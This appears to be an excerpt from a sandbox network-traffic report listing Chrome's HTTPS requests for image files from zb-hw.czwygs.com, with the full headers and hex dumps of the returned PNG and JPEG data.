                                                                                                                                                          2024-06-09 22:41:12 UTC4096INData Raw: 73 50 6e 51 58 65 59 6d 70 70 78 76 4d 67 4e 39 59 38 58 63 32 32 70 50 52 4e 53 6c 6c 45 2f 50 62 64 4f 6c 70 58 41 63 63 4a 64 7a 47 67 58 62 71 58 68 64 31 58 51 39 7a 46 38 2f 37 63 32 32 31 64 76 4d 58 53 78 74 68 75 58 4f 57 4d 71 63 31 45 78 41 4d 6a 71 6c 42 57 67 56 4c 4e 57 4d 72 4a 32 55 70 43 6e 62 6d 37 64 39 64 59 58 78 55 78 70 59 54 58 6e 72 44 63 67 6e 59 2b 79 68 31 36 61 54 50 4c 4d 58 51 6e 78 67 43 79 68 30 77 56 53 56 43 51 6b 30 51 31 45 4d 66 45 39 4c 6a 4c 54 2f 41 6d 4a 4a 45 76 5a 49 63 73 30 62 2b 66 4c 51 30 7a 32 75 47 76 50 61 33 6c 31 56 49 74 64 70 45 4c 47 37 58 57 4c 31 6f 6b 6a 50 63 6f 74 62 6d 77 76 61 7a 32 71 39 69 30 7a 48 45 70 43 39 4c 57 54 33 5a 68 78 75 54 54 32 41 66 57 76 65 31 64 33 50 48 50 66 36 31 7a 56
                                                                                                                                                          Data Ascii: sPnQXeYmppxvMgN9Y8Xc22pPRNSllE/PbdOlpXAccJdzGgXbqXhd1XQ9zF8/7c221dvMXSxthuXOWMqc1ExAMjqlBWgVLNWMrJ2UpCnbm7d9dYXxUxpYTXnrDcgnY+yh16aTPLMXQnxgCyh0wVSVCQk0Q1EMfE9LjLT/AmJJEvZIcs0b+fLQ0z2uGvPa3l1VItdpELG7XWL1okjPcotbmwvaz2q9i0zHEpC9LWT3ZhxuTT2AfWve1d3PHPf61zV


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          401192.168.2.55016790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:12 UTC359OUTGET /cc.png?r=6167440772 HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:12 UTC572INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:12 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 98
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 08 Jan 2020 12:19:17 GMT
                                                                                                                                                          ETag: "5e15c8c5-62"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[19],EU-GER-frankfurt-EDGE5-CACHE6[14,TCP_MISS,18],EU-FRA-paris-GLOBAL1-CACHE19[3],EU-FRA-paris-GLOBAL1-CACHE26[0,TCP_HIT,0],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: dcf170285048c239782645f8ea3dff03
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          Age: 1
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:12 UTC98INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 03 50 4c 54 45 ff ff ff a7 c4 1b c8 00 00 00 0a 49 44 41 54 08 d7 63 60 00 00 00 02 00 01 e2 21 bc 33 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                          Data Ascii: PNGIHDR%VgAMAaPLTEIDATc`!3IENDB`


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          402192.168.2.55017123.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:12 UTC646OUTGET /pc/image-pc/index/382/top/img_bg2.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:12 UTC616INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:12 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 51842
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:18 GMT
                                                                                                                                                          ETag: "64c0a20e-ca82"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[3],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE2[5],EU-FRA-paris-GLOBAL1-CACHE4[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473797
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: aa0d37311eb9bfd16437583182d977f6
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118203
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:12 UTC15768INData Raw: ff d8 ff e1 04 61 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 0c 00 00 01 03 00 01 00 00 00 7f 07 00 00 01 01 03 00 01 00 00 00 59 00 00 00 02 01 03 00 03 00 00 00 9e 00 00 00 06 01 03 00 01 00 00 00 02 00 00 00 12 01 03 00 01 00 00 00 01 00 00 00 15 01 03 00 01 00 00 00 03 00 00 00 1a 01 05 00 01 00 00 00 a4 00 00 00 1b 01 05 00 01 00 00 00 ac 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 31 01 02 00 22 00 00 00 b4 00 00 00 32 01 02 00 14 00 00 00 d6 00 00 00 69 87 04 00 01 00 00 00 ec 00 00 00 24 01 00 00 08 00 08 00 08 00 80 fc 0a 00 10 27 00 00 80 fc 0a 00 10 27 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 43 20 32 30 31 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 31 38 3a 30 31 3a 31 32 20 31 38 3a 35 33 3a 32 37 00 00 00 04 00 00 90 07 00 04
                                                                                                                                                          Data Ascii: aExifII*Y(1"2i$''Adobe Photoshop CC 2015 (Windows)2018:01:12 18:53:27
                                                                                                                                                          2024-06-09 22:41:12 UTC16384INData Raw: f3 35 e1 1e df 0e ea b5 2a 3c 8f 0f 9d 63 bb 69 d3 33 f6 4c 9f 34 13 86 0f b5 2f 0e 24 95 98 20 d9 1f a1 84 ad cd 55 9f 91 76 1d a9 b4 de 67 7f bc 72 99 c6 fe d0 30 fc e9 8a bb d5 5a ca 2f da bd a4 6e 30 55 67 2e 2e 1b 90 7b 17 02 09 75 08 36 af 68 0d f1 b8 45 4a b5 33 0b aa 4d d0 e7 6e 67 19 8e 57 12 42 0b c2 a1 64 00 11 be da 34 de ec ce c3 9d 18 98 6f 69 37 1c 82 e8 06 a9 55 1d 51 27 08 a5 54 d8 8a a4 aa 8f 9d cc ea 17 71 1c db ca 84 54 94 04 da 44 79 a7 93 67 b3 c7 d7 e4 7c 76 af aa 3f 11 c1 8e 73 49 6d e2 11 52 a0 90 9d 11 f1 3c 99 3b ae 92 3f 41 e0 db d9 57 ae 1f a9 e5 e5 f3 ed 66 2b 1c d2 4b 8b 89 42 6a e2 81 c5 37 47 9f 6c 76 ed 47 d0 72 74 69 e4 ce 9d 43 1c 14 c6 69 be 0a ab 82 d5 00 08 78 c4 70 69 25 14 67 c6 9c 5c b6 37 81 e7 33 3a 40 ef de 04
                                                                                                                                                          Data Ascii: 5*<ci3L4/$ Uvgr0Z/n0Ug..{u6hEJ3MngWBd4oi7UQ'TqTDyg|v?sImR<;?AWf+KBj7GlvGrtiCixpi%g\73:@
                                                                                                                                                          2024-06-09 22:41:12 UTC16384INData Raw: 27 3f 89 13 17 a5 bc aa fc 51 d7 62 38 b9 4a 5e e2 6f c7 6c a7 b7 ba be 58 eb 0b 70 95 6a 82 27 e2 43 66 a4 8a 10 77 ca 44 f1 8e 9d 9b 7c 3f f2 52 6e cc 05 3d af 31 f2 98 76 6d f0 ff 00 c8 24 71 9b 78 15 26 d2 89 d1 48 76 6d f0 ff 00 c8 26 ec cd 4d f9 7c d0 02 91 d7 05 6a da c9 01 0e 64 99 5f 12 32 50 65 6a 20 83 b5 6d e6 80 a7 36 e0 a8 e0 3a 08 ea 5a c1 5a b6 b2 40 99 cf 62 1a bc 4b e8 8f f4 63 4a d4 74 44 c0 43 9a 5f 9c 07 08 d7 6a 3d 2c 12 76 61 51 1c 2d 59 c6 3b 56 f8 14 43 98 4a bc 75 98 d2 8a 59 02 6e cc 2a 76 81 af ad 1d 60 93 ad 48 c5 18 d5 37 92 8a 66 be 58 d3 84 4e 73 d0 53 8c cb 5c ae 34 a5 d9 0d d4 89 b6 26 54 9a c8 9f 88 6c d2 c3 3e d6 fa 00 0c 36 c4 8d b7 99 2c 5c 70 11 3b 0a aa 08 27 62 22 c4 ed c2 5e e5 f9 8a 88 33 21 a2 b7 b6 c8 04 8a a3
                                                                                                                                                          Data Ascii: '?Qb8J^olXpj'CfwD|?Rn=1vm$qx&Hvm&M|jd_2Pej m6:ZZ@bKcJtDC_j=,vaQ-Y;VCJuYn*v`H7fXNsS\4&Tl>6,\p;'b"^3!
                                                                                                                                                          2024-06-09 22:41:12 UTC3306INData Raw: 94 5e 12 2b 77 2d 22 71 1c 09 99 bc f4 ed 1a dd ba 29 19 72 4b f6 d0 ae 51 5e d3 2e e5 7f 9c ff 00 98 ef 8a 33 bd 70 33 29 37 ed 55 0b b9 5f e7 3f e6 3b e2 8b b9 74 8a cb a7 f1 c8 61 e1 9b 4c 54 3f ed 1d f1 44 de b8 18 df 3e 94 61 76 11 ec f8 b9 51 0b 82 a6 ca 45 df 1e 94 5d d7 3a 0d 3e 14 a7 6d 83 83 c8 5d e6 51 97 24 f4 1b a7 ac 52 30 0c a8 99 c4 1c 6f 99 79 20 9a 59 a2 ca 6e bf 6c 51 ad 2c 32 6e 68 22 fc db 5b b0 ac 5d cb 81 37 5c e8 19 ce c2 ba 03 5c a6 84 b6 65 42 22 88 7b b2 45 52 97 ee 8d 04 01 85 0a 95 1b 40 a1 94 81 33 8b 08 e3 56 56 e0 f3 c0 e6 2d 57 3c 4c 28 b4 6e 8e a6 d3 4f 20 c3 2b 31 f3 40 58 33 33 7a 0b 89 67 4c 43 98 97 0b ad 02 ec a7 d7 15 3a 19 94 77 0a f6 5c bb 30 54 2c a2 a7 53 9c a3 b4 41 8a 70 e9 f3 b7 a5 3f 96 0d 54 46 5b 43 c4 bf
                                                                                                                                                          Data Ascii: ^+w-"q)rKQ^.3p3)7U_?;taLT?D>avQE]:>m]Q$R0oy YnlQ,2nh"[]7\\eB"{ER@3VV-W<L(nO +1@X33zgLC:w\0T,SAp?TF[C


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          403192.168.2.55017590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:12 UTC612OUTGET /pc/image-pc/index/312/parner/logo_monaco.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://hg679.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:12 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:12 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 5239
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:56 GMT
                                                                                                                                                          ETag: "5d71fe88-1477"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[4],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE1[3],EU-FRA-paris-GLOBAL1-CACHE14[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465109
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: b47bb95ad997255a648f13e5fddfbc8d
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126891
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:12 UTC5239INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 22 00 00 00 3a 08 06 00 00 00 d5 c2 8b 34 00 00 14 3e 49 44 41 54 68 43 c5 99 77 5c 54 67 d6 c7 bf 77 ee 54 da d0 7b 15 51 10 05 6b d4 44 d1 d8 62 8b 62 47 51 57 8d 12 35 46 d1 35 6e 12 53 d4 94 8d e9 26 1a b1 64 83 dd a0 b1 46 b3 1a 4b 22 88 58 10 45 9a 05 bb 28 02 03 c3 30 03 d3 ee bc 9f 21 9b 7d 37 6d dd 6c 3e ef e7 9d 7f 66 e6 ce 7d ce f3 bd e7 3c e7 f7 9c e7 8c c0 1f 7c ad 5f a4 98 ed a2 56 47 4e 58 66 58 f4 47 4c 09 7f 64 70 fa a4 76 53 66 8c f2 5b 2b 49 56 c5 de 13 f6 bf bc f2 71 ee bb ff ad bd 3f 04 e2 0d 61 af 3c cf 1a ff 20 ff d0 39 2f 3f 1c 56 07 37 ff 5f 40 62 43 f0 c9 58 de 35 5b e3 aa f6 4c 5f fc 7d d2 a9 12 ae fd 9f 81 e4 64 06 3c e3 e7 a5 ef 5b 57 6f a7 b0 d4 fa dd 8c b7 59 fb e3 64
                                                                                                                                                          Data Ascii: PNGIHDR":4>IDAThCw\TgwT{QkDbbGQW5F5nS&dFK"XE(0!}7ml>f}<|_VGNXfXGLdpvSf[+IVq?a< 9/?V7_@bCX5[L_}d<[WoYd


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          404192.168.2.55017023.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:12 UTC652OUTGET /pc/image-pc/index/382/button/icon_vip_n.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:12 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:12 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 1820
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:11 GMT
                                                                                                                                                          ETag: "64c0a207-71c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[3],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE30[4],EU-FRA-paris-GLOBAL1-CACHE23[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473797
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: f9b10ea5a23b749f65a063439d51757a
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118203
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:12 UTC1820INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 25 00 00 00 25 08 06 00 00 00 c5 9e 20 03 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 28 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 31 20 37 39 2e 61 38 64 34 37 35 33 34 39 2c 20 32 30 32 33 2f 30 33 2f 32 33 2d 31 33 3a 30 35 3a 34
                                                                                                                                                          Data Ascii: PNGIHDR%% tEXtSoftwareAdobe ImageReadyqe<(iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:4


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          405192.168.2.55016923.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:12 UTC653OUTGET /pc/image-pc/index/382/button/icon_prom_n.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:12 UTC614INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:12 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 908
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:11 GMT
                                                                                                                                                          ETag: "64c0a207-38c"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[3],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,1],EU-FRA-paris-GLOBAL1-CACHE27[2],EU-FRA-paris-GLOBAL1-CACHE23[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473797
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 9b55eaa0f16973ce0bab6b8d7d945c4f
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118203
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:12 UTC908INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 25 00 00 00 25 08 06 00 00 00 c5 9e 20 03 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 03 3e 49 44 41 54 58 85 d5 d7 cd 8b 1c 55 14 05 f0 5f f5 74 24 4e 34 9a 60 34 12 0d c2 68 c0 95 0b 41 dc 25 a2 18 31 62 14 1a c1 9d 20 48 50 f0 3f 70 e5 3e e0 07 2a 8a e2 4e 30 71 c4 45 c4 20 63 e2 4e 04 17 6e 54 64 06 f2 e1 c4 44 4d 8c 1f 1d 3b 33 5d 75 5d f4 eb 99 ea ca 74 d3 3d 26 e9 f1 c0 81 7e ef 9e 7b ef e1 d5 ab 4b 97 88 d0 4b 7b 22 4c 47 38 95 b6 ce 47 f8 32 c2 f3 11 d6 47 b0 0a ae 4f f9 47 53 bd 48 f5 a7 53 bf 1e fd b2 99 dc b6 c8 cd 44 2e 06 f0 78 e4 76 45 ce 08 dc 95 f2 06 d5 9d 49 fd 45 de 35 d5 b6 25 da 66 a3 2d 86 e0 c5 68 6b 44 9b 21 d8 48 fa 61 ea ce 26 1f c9 d4 82 c3 b1 20
                                                                                                                                                          Data Ascii: PNGIHDR%% pHYs>IDATXU_t$N4`4hA%1b HP?p>*N0qE cNnTdDM;3]u]t=&~{KK{"LG8G2GOGSHSD.xvEIE5%f-hkD!Ha&


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          406192.168.2.55017223.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:12 UTC653OUTGET /pc/image-pc/index/382/button/icon_coin_n.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4044.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:12 UTC614INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:12 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 2146
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:10 GMT
                                                                                                                                                          ETag: "64c0a206-862"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[3],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE26[3],EU-FRA-paris-GLOBAL1-CACHE1[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473797
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: dc12bad2205666316658f59600facdc3
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118203
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:12 UTC2146INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 25 00 00 00 25 08 06 00 00 00 c5 9e 20 03 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 28 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 31 20 37 39 2e 61 38 64 34 37 35 33 34 39 2c 20 32 30 32 33 2f 30 33 2f 32 33 2d 31 33 3a 30 35 3a 34
                                                                                                                                                          Data Ascii: PNGIHDR%% tEXtSoftwareAdobe ImageReadyqe<(iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:4


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          407192.168.2.55017323.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:12 UTC641OUTGET /pc/image-pc/index/382/img_bg.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
